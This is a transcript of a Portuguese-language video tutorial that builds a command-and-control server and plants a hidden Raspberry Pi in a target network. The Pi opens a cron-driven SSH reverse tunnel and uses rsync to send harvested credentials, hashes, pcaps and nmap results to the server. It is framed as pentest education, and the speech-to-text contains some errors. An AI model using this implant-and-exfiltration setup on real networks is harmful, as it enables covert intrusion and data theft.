Fala galera, Ricardo Longato mais uma vez, e nesse vídeo eu vou falar um pouco sobre Raspberry e CIC Server, Command Control Server. Então nessa aula a gente vai fazer aí uma configuração básica aí no CIC Server, vou explicar o que é isso, e depois a gente vai fazer aí um ataque bem interessante aí com Raspberry, onde ele vai fazer um túnel para conectar com o seu CIC Server e transferir dados através de sincronização. Então é algo bem bacana aí que a gente pode usar como um vetor de ataque também. Então a gente já começa a usar o Raspberry como uma ferramenta aí para pentest também ou como um vetor de ataque, ok? Vamos lá então. Bom, aqui na minha tela eu tenho o meu CIC Server. Apesar de parecer que eu estou carregando ele de uma máquina virtual, na verdade isso daqui está na nuvem. Tá? Ele está via internet, então ele não está localmente na minha máquina. E até para mim não expor o endereço IP do meu CIC Server, eu fiz uma configuração aqui no DNS para ele apontar, fazer a resolução de nome ali, e aí eu não divulgo o endereço IP dele, ok? Bom, o que é um CIC Server? Né? CIC Server é muito usado por criminosos também. Geralmente eles precisam de uma infraestrutura aí para centralizar todo o ataque que está sendo feito. Então imagina num ataque de negação de serviço, DDoS, por exemplo, os criminosos vão manter um CIC Server para todo mundo que estiver infectado se comunicar com esse CIC Server e através dele ele direcionar o ataque para onde ele quer. Ou o cara tem um malware e ele está disseminando esse malware, ele pode manter um CIC Server para estar recebendo todas as informações que ele for roubando, enfim. E a gente também tem o uso do lado bom, né, no caso do CIC Server, que a gente pode ter um pentester, geralmente tem um CIC Server na internet, porque facilita muito a vida. E o CIC, na verdade, significa Command Control, então servidor de controle de comandos, algo mais ou menos assim. Mas isso é só um nome bonito para um computador que está na internet. Então, a sacada do CIC Server é ser um computador que você consegue gerenciar ele de qualquer lugar que você esteja e lá ele vai ter todas as ferramentas que você precisa. Se você precisar receber uma conexão da sua vítima, você vai ter sempre uma conexão lá configurada, você já deixa ele pronto para receber essa comunicação lá. Então, é bem interessante, você não fica limitado a algo que está na sua infra, por exemplo. Você vai estar na internet. Então é bem bacana. Bom, como que você pode montar um CIC Server? Basicamente, o pessoal às vezes compra uma VPS, um servidor virtual, né, na internet aí. Tem vários sites que vendem hospedagem, né, de um servidor privado para você, e aí você paga uma taxa ali mensal, tem muitos que são bem em conta mesmo, e aí te fornece um servidor que é seu ali, você pode instalar o que você quiser ali, fazer o que você quiser com ele. Outra opção seria você comprar uma infra mesmo, um servidor dedicado, enfim, tudo depende do que você deseja, da sua necessidade, né? Ou simplesmente você acha às vezes algumas coisas gratuitas aí na internet, pode não ser tão confiável assim. Ou você monta aí uma máquina, coloca ela na internet e vira seu CIC Server, entendeu? Também. Enfim, então aqui eu tenho meu CIC Server, que é essa máquina aqui, está escrito CC Lab, e aqui não está rodando nada, uma máquina que está crua, acabei de instalar, justamente para a gente fazer um teste aí. Então, eu vou deixar esse Command Control ativo aqui. Primeira coisa que eu vou fazer nele aqui vai ser ativar o SSH. Então, tá aqui com o SSH ativo. Também vou deixar esse serviço iniciando junto com o sistema. Então, se serve reiniciar, ele já sobe com o SSH. Justamente porque aqui eu abri uma tela direto da VM, assim, né? De dentro de onde está esse CIC Server. Mas através de SSH fica mais fácil de eu gerenciar ele. Então SSH defaults, né, no caso ali, para ele carregar sempre o SSH na hora que iniciar, ok?
E aí eu vou fazer uma outra configuração aqui, que na verdade é só vir aqui e criar um diretório, que eu vou pôr o nome de RESP. Então criei aqui um diretório dentro de OPT chamado RESP. Vou dar permissão para esse diretório. E por enquanto é isso. Posso até fechar aqui. E aqui no meu Mac agora eu vou fazer uma conexão via internet mesmo, só que logicamente eu não vou divulgar o IP e nem mostrar a hora que eu estiver digitando a senha desse servidor, mas eu vou logar nele agora através do SSH. Então, SSH, só para a gente fazer um teste, né? Root. Beleza, loguei no servidor e estou na mesma tela que eu estava ali dentro aquele gerenciamento de VM que eu estava agora há pouco. Só que agora eu estou via SSH. Uma outra coisa que a gente pode instalar no servidor seria o rsync. Já vou explicar o que é o rsync. O rsync eu usava ele bastante antigamente para fazer backup. Ele sincroniza arquivos, ele fecha um túnel SSH e faz transferência de arquivo dentro desse túnel aí. Então é bem interessante. E eu gosto muito de usar ele em situações como essa. Então, por exemplo, aqui nesse ataque a gente vai configurar aqui o Raspberry daqui a pouco. E aí a gente vai configurar o Raspberry para se comunicar com o C++ Server automaticamente. E eu já vou explicar mais ou menos como funciona esse tipo de ataque. E ele vai ter um script que vai ficar fazendo um rsync para aquele diretório que a gente acabou de criar aqui, RESP. Então, imagine que você plante, né, o Raspberry no seu alvo, conectou ele na rede ali, automaticamente ele se comunica com o C++ Server, e aí tudo que você estiver gerenciando no seu Raspberry e você começar a querer copiar os arquivos do Raspberry para o C++ Server, ele já vai sincronizar isso automaticamente no que você jogar dentro da pasta do Raspberry lá. Então é bem interessante, vamos entender isso um pouco na prática. Então aqui ele já está instalado, o rsync, tá? Eu vou até fechar aqui a conexão aqui com o servidor, limpar a tela. E agora vamos trabalhar então com o Raspberry. Aqui o Raspberry está conectado na minha rede local, ele está com IP local aqui no caso, diferente do C++ Server que está na internet já. Então aqui ele está com IP local e está cru aqui também, do jeito que a gente fez no último vídeo lá, onde a gente só copiou a imagem do Kali para dentro do microSD e botou ele. Então, da mesma forma que eu vou ligar o serviço do SSH dele, Service SSH Start, vou colocar também para iniciar junto com no boot já, né? Beleza? E agora a gente pode gerenciar ele por aqui, então. SSH, root, e agora o IP aqui do nosso Raspberry. Pronto. Estou logado dentro do Raspberry. O nome dele é RaspHack, o nome que eu deixei nele. E aí vamos começar a configurar ele também. Então vamos instalar aqui também o rsync. Já deve estar instalado aqui no caso. Vamos vir também para OPT e criar um diretório aqui. Vou colocar dados, o nome do diretório. Vou dar permissão também para esse diretório. Então, acabei de criar aqui um diretório chamado dados. Esse diretório é onde eu vou centralizar todos os dados que eu quero extrair, né, e filtrar para dentro do C++ Server quando ele estiver em funcionamento, ok? Beleza, então a gente fez aqui só algo bem básico no Raspberry. Bom, o que a gente vai fazer agora para tornar um ataque um pouco interessante, né? Então você imagina a seguinte cena, você pega um Raspberry desse, pequenininho, como a gente viu que ele é, tamanho de um cartão, ou você pode colocar ele num case, imagina você colocar ele num case onde ele pareça com, ou dentro de uma fonte de uma impressora, por exemplo, ou de algum equipamento, e aí você coloca ele perto lá de equipamentos que tem dentro de uma empresa que você está infiltrado ali dentro, viu um cabo de rede dando soco, espetou ali e já infectou ali o ambiente, né? Infectou assim no sentido de que você tem um equipamento que vai te permitir acessar aquela rede de forma externa, porque a partir do momento que o Raspberry receber a conexão com o cabo de rede aqui,
o seu 6C Server já vai se comunicar com o Raspberry. E aí você vai ter todas as ferramentas que você precisa já para varrer a rede, para começar a invadir esse ambiente. Então, um exemplo disso, teve uma cena no Mr. Robot na primeira temporada, acho que lá pro quarto episódio, eu não me recordo muito bem, onde eles queriam, eles utilizaram exatamente uma técnica assim, né? O Elliot, ele entrou lá na empresa que era o alvo, né, deles, e basicamente ele plantou um Raspberry lá para depois receber a conexão e controlar esse Raspberry através da internet. Então o que a gente vai fazer é algo muito parecido com isso, ok? Vamos lá então. Bom, se a gente quiser se conectar no 6C Server daqui, a gente pode dar um SSH, root e o IP do 6C Server. Aqui no caso eu deixei como Secret Server, porque o DNS já está fazendo a gambiarra aí para mim não divulgar o IP do 6C Server. Mas aí ao fazer isso ele vai pedir senha. Olha lá, ele vai pedir a senha, certo? E aí, se eu fizer um script aqui, eu não quero ficar digitando a senha toda hora, ou usar, por exemplo, o SHPS lá para mim digitar, deixar escrito a senha ali, ele já faz isso automático. Porque aí eu estaria falando a senha do meu 6C Server. Então, a forma mais inteligente de fazer isso é através de chave privada e chave pública. Então, a gente pode usar aqui o SH Keygen no próprio Raspberry mesmo e gerar um par de chaves dentro do nosso Raspberry. Então, esse é o primeiro passo. SSH Keygen, ele vai gerar um par de chaves. Ele vai gerar esse par de chaves dentro de root.ssh. Vai ter aqui, então, ID RSA e ID RSA Pub, que é a minha chave pública e a minha chave privada. Então eu vou pegar a chave pública, que a gente acabou de gerar no Raspberry, vou listar ela aqui, vou copiar o conteúdo dela e vou autorizar isso lá dentro do meu 6C Server, porque eu estou falando para o 6C Server que eu confio nesse Raspberry. Então, sempre que o Raspberry tentar fazer uma conexão SSH com o servidor já vai aceitar isso, porque eu tenho a chave privada, ok? Que seria essa chave aqui, ok? Então, vamos cadastrar o conteúdo da chave pública no nosso 6C Server. Então, para isso, eu vou fazer uma conexão normal no 6C Server. Bom, através do Raspberry, eu conectei no meu 6C Server. Então, agora eu estou dentro do 6C Server e eu fiz essa conexão de dentro do meu Raspberry, tá? E não do meu terminal, igual eu tinha feito no começo. Beleza, então aqui a gente vai para dentro de root.ssh, authorized keys, e a gente vai copiar então aquela chave que a gente acabou de gerar lá, a chave pública. Basicamente a gente vai colocar ela aqui dentro desse arquivo. Vamos ler o arquivo agora. E aí a gente está falando, olha, 6C Server, eu confio nesse host aqui, que tem essa chave aqui, ok? Então ele só vai aceitar também se esse host, na hora que fizer a conexão, tiver a chave privada disso, que no caso o nosso Raspberry tem, que a gente acabou de gerar. Então vou dar um exit aqui para fechar, voltar aqui para o Raspberry e vamos fazer um teste então. Agora eu vou dar um sh root @secret server de novo, só que agora lembra que a primeira vez que eu fiz isso ele pediu senha, né? Agora eu vou dar um enter e ele já conectou direto no 6C Server sem pedir senha, porque agora ele já confia e a gente está fazendo esse acesso através de chave pública e chave privada, ok? Então o primeiro passo aí já está pronto, a nossa comunicação. E agora o mais interessante de tudo, a gente precisa fazer com que o nosso Raspberry se comunique com o 6C Server e através do 6C Server a gente consiga chegar ao Raspberry, que é o mais importante, através da internet. Então para isso a gente vai usar algumas opções do SSH. Então vamos lá, SSH-F para ele usar em background, o "-n" maiúsculo aqui é para ele não executar comandos, então estou falando para ele que eu não vou executar comandos. E aqui o "-R", agora a gente vai passar como que vai funcionar esse tunelamento que a gente vai fazer. Então aqui no caso
eu vou utilizar a porta 443, tá? Lá no CIC Server depois para acessar o Raspberry. Localhost e a porta 22 aqui que é que é o SSH rodando, ok? E por último aqui a gente faz a comunicação com o servidor, Circuit Server. Então basicamente a gente está criando um túnel com esse comando aqui. Vamos ver o que acontece quando a gente faz isso, ó. Bom, aparentemente não aconteceu nada, né? Nesse lado aqui. Mas, se a gente conectar no servidor agora, posso até conectar através de um outro terminal. Lembrando que esse terminal aqui é o do Raspberry, eu estou conectado no Raspberry, não no Mac. E agora nesse aqui eu estou no Mac. Então eu vou fazer uma comunicação aqui com o meu CIC Server através do Mac. Beleza, conectei no CIC Server. E agora vamos listar as portas abertas lá. Notem que interessante, ó, o CIC Server ele só tem a porta 22 aberta. Lembra que a gente configurou no começo da aula. Só tinha 22, que é o SSH, tanto é que a gente acabou de conectar no SSH. Mas agora ele mostra que ele tem uma outra conexão aqui, que é a 443. Esse aqui, na verdade, é o tráfego que está sendo tunelado através desse primeiro comando que a gente deu aqui. Então ele está pegando tudo que tem na porta 22 ali e encaminhando para a porta 443. E qual que é o resultado disso? Então, agora vamos esquecer que a gente tem o Raspberry aqui, como se a gente não tivesse o Raspberry, que esse Raspberry esteja em qualquer lugar, na nossa vítima. E aí a gente conectou esse Raspberry lá na rede. O Raspberry automaticamente comunicou com o CIC Server aqui e fez esse tunelamento. E agora o que a gente faz é ssh root @localhost, certo? Porque eu vou direcionar aqui para essa porta 443, então eu quero me conectar no que tiver dentro dessa porta 443, que no caso é o meu acesso do Raspberry. Ao fazer isso, ó, ele pediu a senha. Essa senha é de quem? É a senha do meu Raspberry. Então eu coloco a senha do Raspberry aqui. E olha que interessante, através do meu CIC Server, eu conectei no meu Raspberry. Então, esse aqui, basicamente, é o ataque sendo feito de uma forma ainda manual, né? Então, a gente vai criar um script para automatizar todo esse processo. Mas só para ficar claro o que a gente fez aqui. Aquele primeiro comando que a gente rodou, do tunelamento da SSH dentro do Raspberry, está fazendo o Raspberry conectar no CIC Server. E aí, esse CIC Server aqui vai abrir a porta que a gente indicou ali, no caso a 443. E aí, quando a gente se conecta na 443, a gente cai no Raspberry. E a ideia é justamente essa. Então, o cenário é esse. Eu tenho meu Mac aqui no escritório e vou me conectar no meu CIC Server que está em algum lugar do mundo, na internet. E aí, meu CIC Server lá já tem a conexão do Raspberry, que pode estar em outro estado, em outro lugar, outro lado do mundo, que foi onde eu infectei a minha vítima com o Raspberry. E aí, a partir disso, eu me conecto no Raspberry. Se eu der um ifconfig aqui, olha que interessante, estou dentro da rede que o Raspberry está. Então, isso pode parecer um pouco confuso, né, da forma que eu estou explicando, mas ó, essa tela aqui eu estou conectado dentro do meu CIC Server através da internet. Só que a hora que eu fiz esse comando aqui, eu caí dentro do Raspberry. Ele está fazendo isso através do tunelamento via internet. Só que aí eu caí na rede interna onde está o Raspberry. E aí, uma vez que eu estou dentro dessa rede interna, eu posso rodar um Nmap, eu posso começar a descobrir os alvos que tem dentro dessa rede, invadir todo o ambiente, filtrar esses dados e jogar isso para dentro do CIC Server. A ideia é justamente essa. Teria um uso também interessante, um uso para o bem, por exemplo, não só um uso para ataque, mas imagina você vai fazer um pen test, você precisa fazer um pen test interno, mas a empresa não tem budget para fazer todo o deslocamento de você ter que ficar, sei lá, X dias alocados internamente lá dentro da empresa e gastando com alimentação, hotel, enfim. Você poderia
configurar um Raspberry desse, enviar para a empresa conecta na rede dela, esse Raspberry vai se conectar com o seu 6C Server confiável, né, do Pentester no caso, e aí através disso você tem, aqui no caso eu tenho acesso à rede interna dessa empresa através do meu 6C Server, e aí eu consigo fazer todo o Pentest a partir disso, para depois gerar os resultados para a empresa sem estar fisicamente na empresa, então tem esse lado aqui também, ok? Bom, vou desconectar então no meu Raspberry aqui, e desconectar aqui do meu 6C Server. E voltar pro Raspberry aqui. Bom, só para vocês entenderem então, vou dar um PS ao X aqui, SH, ó, só para a gente ver aqui, ó, ele está executando o comando tunelamento que a gente fez aqui, certo? Eu posso dar aqui um kill out aqui no SSH e automaticamente eu acabei de matar esse processo. Se a gente conectar agora no servidor, e dar um netstat lá, agora que eu matei o processo, note que o servidor voltou ao normal, não existe mais tunelamento, e agora no servidor, eu consigo, apesar de eu conseguir acessar o 6C Server, eu não consigo acessar meu Raspberry através do 6C Server, porque eu não estou tunelando nada, eu acabei de fechar a conexão, certo? Então só para ficar claro isso. Bom, vamos automatizar então esse processo aí. Vou vir aqui para dentro de OPT, que é onde está a nossa pasta de dados aqui, e aí vamos criar então um conecta que vai a cada 1 minuto, vai fazer essa comunicação com o 6C Server aí, tá? Então, isso é justamente para você não sabe nada sobre a rede do alvo, você não sabe faixa de IP, você não tem como acessar o Raspberry. Então, tudo que você tem é uma chance de plugar esse Raspberry dentro dessa rede e rezar para o 6C Server receber a conexão lá. Então, para isso, a gente pode fazer um script que a cada 1 minuto vai fazer esse processo automático. Então, para isso, vamos fazer aqui conecta.sh /bin/sh, e aí a gente vai dar esse mesmo comando que a gente acabou de fazer aí. 443 localhost 22 root secret server. Basicamente é isso. Então essa linha de comando é responsável por fazer a comunicação do Raspberry, tunelar essa comunicação para o seu IC Server. Beleza. Vou pegar isso agora então e vou editar aqui o meu Chrome Tab /etc Chrome Tab, e aí eu vou fazer o seguinte, ó, a cada 1 minuto de todos os dias, como root, você vai executar, e aí eu falo para ele aqui, ó, executar opt conecta.sh. Então, todos os dias, a cada 1 minuto, ele rodando como root vai executar aqui o conecta.sh. Sair. E aqui eu vou dar permissão para o conecta. chmod 777 conecta. Certo? E reiniciar aqui os serviços do Chrome, né? Restart. Reiniciei o serviço do Chrome. E aqui eu vou abrir aqui o meu 6C Server. Notem que o 6C Server aqui, eu conectei através do Mac, ele está só com a porta 22 aberta, certo? Ele não fez o tunelamento ainda. E aí a cada 1 minuto ele vai executar o script. Então na hora que ele executar, aqui ó, ele acabou de executar e ele faz o tunelamento aqui ó. E aí agora a porta 443 está disponível. Agora eu consigo, através do meu 6C Server, acessar meu Raspberry. Tá aí, ó. Consegui acessar o Raspberry através do 6C Server. Certo? Então, deixa eu fechar aqui meu 6C Server.
Bom, beleza, então a gente já conseguiu fazer essa parte ficar automatizada. Agora vamos imaginar que eu tenho arquivos aqui e eu quero transferir para o meu CIC Server. Beleza, eu posso fazer um SCP, eu posso subir um FTP lá e fazer FTP e tal, mas tem uma forma mais inteligente de a gente fazer isso através de rsync, que é muito mais simples, né? Então, aqui além do connect, a gente pode fazer esse filtra, .sh. Então, bin sh. E aí a gente vai usar o rsync. Então, rsync. Vou usar uma opção cravos EP. Isso aqui, cada um desses aqui faz uma determinada função dentro do rsync. Então, o P aqui mantém as permissões, o Z faz compressão, o V é de verbose, o A é para ele é de archive, né? O R é de recursivo, então tudo que estiver dentro do diretório ele vai copiar, tá? E aí o que a gente vai fazer aqui é colocar onde que estão os dados, então no caso que é o pt dados, e aí eu falo para onde eu vou enviar isso, né? Então root @secretserver, o local onde eu vou salvar lá dentro também, opt resp. Então ele está fazendo um sincronismo de todos os arquivos que tiverem dentro de dados para dentro de resp lá no servidor, tá? Vou salvar aqui, dar permissão também, chmod 777 filtra. Vou abrir aqui novamente o cron para a gente agendar isso, cron tab. E aqui no final, vou então adicionar essa segunda regra aqui, que é o isFiltra.sh. Então, a cada 1 minuto, além dele fazer a conexão, ele vai fazer o isFiltra também. Então, se eu abrir aqui o meu CIC Server, aqui no apt, tem a pasta do resp aqui, não tem nada aqui dentro. Então, vamos imaginar que aqui dentro de dados, ao varrer a rede aqui, eu já comecei a encontrar algumas coisas e, por exemplo, criei aqui um arquivo senhas que eu quero mandar esse arquivo lá para o servidor. Ou melhor, eu posso pôr aqui assim, ó, hashes. Hash para craquear, por exemplo. Pcap para analisar. Então, vamos imaginar aqui que a gente pegou e conseguiu comprometer parte do ambiente aí através do ataque, e aí você conseguiu várias credenciais, você precisa fazer a quebra dessas senhas, só que para você fazer isso usando o poder de processamento do Raspberry é inviável, né? Então você poderia levar muito tempo, você pode até causar um crash no seu Raspberry e ele parar de funcionar e você perder o acesso. Então é mais inteligente você pegar esses dados e jogar ele para o seu CIC Server. Lá no seu CIC Server você tem processamento, você tem mais flexibilidade para trabalhar com esses dados. Então aqui eu gerei 2 arquivos aqui só como uma demonstração, o senhas e o teste.pcap. Não fiz nada com eles e na hora que... já foi até executado. Pode ver que aqui no CIC Server ele já recebeu tanto senhas quanto o teste.pcap, ele já recebeu automaticamente por conta daquele script que já vai fazendo isso, sincronizando. E se eu vir aqui, por exemplo, e criar um novo arquivo, criei um novo arquivo aqui e vou alterar os senhas também. Os senhas tinha hash para craquear, agora eu vou colocar 10, 10, 10, 10, sei lá. Fiz uma alteração no arquivo aqui. Então, por enquanto ele ainda não copiou, se a gente olhar como está os senhas, hash para craquear. O servidor ainda não recebeu isso. Na hora que passar 1 minuto que o script foi executado, a gente vai ver que ele vai, além de ter um novo arquivo aqui, ele já vai ter alterado também os senhas, porque ele já entende essa alteração e já sobrescreve do lado do CIC Server também. Beleza? Bom, como a gente pode ver, tem um novo arquivo aqui agora, se a gente ler os senhas,
ele está com os 10, 10, 10 que a gente colocou aqui no final. Então, basicamente agora está tudo funcionando. E aqui do CIC Server, a gente pode até fechar essa comunicação aqui. Bom, pessoal, vamos fazer a POC do ataque então. Então, tem o Raspberry aqui, estou com o meu CIC Server aberto aqui, então ainda não infectei a rede alvo ainda com o Raspberry. Então aqui no meu CIC Server, só para vocês verem, não tem nada rodando nele ainda, a não ser o SSH que eu estou conectado no momento, certo? E aí eu vou fazer o seguinte, imagina que eu estou na minha rede alvo, eu encontrei, eu vi um lugar ali onde eu posso esconder meu Raspberry, e aí achei um cabo de rede ali, conectei, vou até ligar meu Raspberry primeiro, né? Vou ligar ele lá na energia, certo? E logo depois que eu ligar ele ali, vou pegar aqui o cabo de rede que eu encontrei e conectar o cabo de rede, acendeu aqui a luzinha, e vou deixar ele escondido lá. Então, estou simulando aqui, no caso, a rede alvo, né? A rede que é o alvo do nosso ataque aqui. Então, imagina que você foi lá, escondeu o Raspberry em algum lugar lá, camufladinho, conectou no cabo de rede e ninguém vai encontrar ele lá. Enquanto isso, o que ele vai fazer ali, depois que ele bootar o sistema, que ele carregar tudo que a gente fez ali, os scripts, basicamente ele vai fazer uma comunicação com o nosso CIC Server. Por enquanto aqui a gente pode ficar monitorando, aguardando ele enviar a conexão, porque a hora que a gente conseguir conectar, a hora que ele conseguir fazer o tunelamento, a gente consegue se conectar no Raspberry. E aí, uma vez conectado ao Raspberry, a gente vai ter acesso a essa rede que é desse cabo de rede aqui. E aí a gente consegue, por exemplo, varrer toda a rede, fazer todo o ataque, né, mesmo estando do outro lado do mundo, digamos assim. Bom, como a gente pode ver aqui, ó, ele já recebeu o tunelamento do Raspberry. Pô, maravilha. Então, sh @localhost -p443. Ele vai pedir a senha do Raspberry. Digito a senha e pronto, estou dentro do Raspberry. Se eu der um ifconfig, estou dentro da rede interna onde esse Raspberry foi plugado. E aí eu estou gerenciando isso através da internet, o que é mais legal. Inclusive, ao plantar o Raspberry no alvo, a gente poderia ter utilizado, por exemplo, um adaptador de rede wireless plugado nele aqui. E aí a gente teria uma rede wireless também no Raspberry para poder fazer, por exemplo, ataques de rede Wi-Fi de forma remota no alvo. Então isso é bem bacana também. Então se você deixa espetado ali um adaptador que você vai depois executar a switch do AirCrack, por exemplo, para tentar quebrar, identificar a rede Wi-Fi, você consegue fazer tudo isso controlando o Raspberry através do CIC Server. E depois você pode enviar esses dados que você coletou, ou dados que você precisa fazer brute force, ou quebrar, ou alguma coisa do gênero. Você consegue mandar isso para o CIC Server daquela forma que eu falei. Então, se a gente vir aqui, por exemplo, em OPT dados, né, foi onde a gente deixou a pastinha de dados, eu poderia rodar aqui um Nmap, por exemplo, para começar a descobrir os hosts vivos dentro dessa rede. Então 92.6800/24-OG, e aí coloco aqui, eu quero que ele grave isso com o nome de vivos.txt. Aí basicamente o meu Raspberry agora está varrendo essa rede, e aí ele salva aqui um arquivo chamado vivos.txt, ó. Certo? E aí esse arquivo, automaticamente, daqui a um minuto, ele já vai estar no meu CIC Server, porque eu estou trabalhando com ele dentro da pasta dados aqui. Então se a gente fechar, inclusive se a gente fechar aqui a conexão com o Raspberry e voltar para o nosso CIC Server, ó, dentro de Rasp, daqui a pouco o arquivo já vai chegar aqui. Vamos aguardar um pouquinho. Ah lá, já chegou. Posso dar aqui um grep up para ver quais são os hosts vivos dentro dessa rede aí que o Raspberry está. E aí a gente tem esses hosts aqui ativos dentro dessa rede.
Então é uma forma aí, de exemplificar, né, de fazer a POC de tudo que esse ataque proporciona, beleza? Espero que tenham gostado e até mais, pessoal!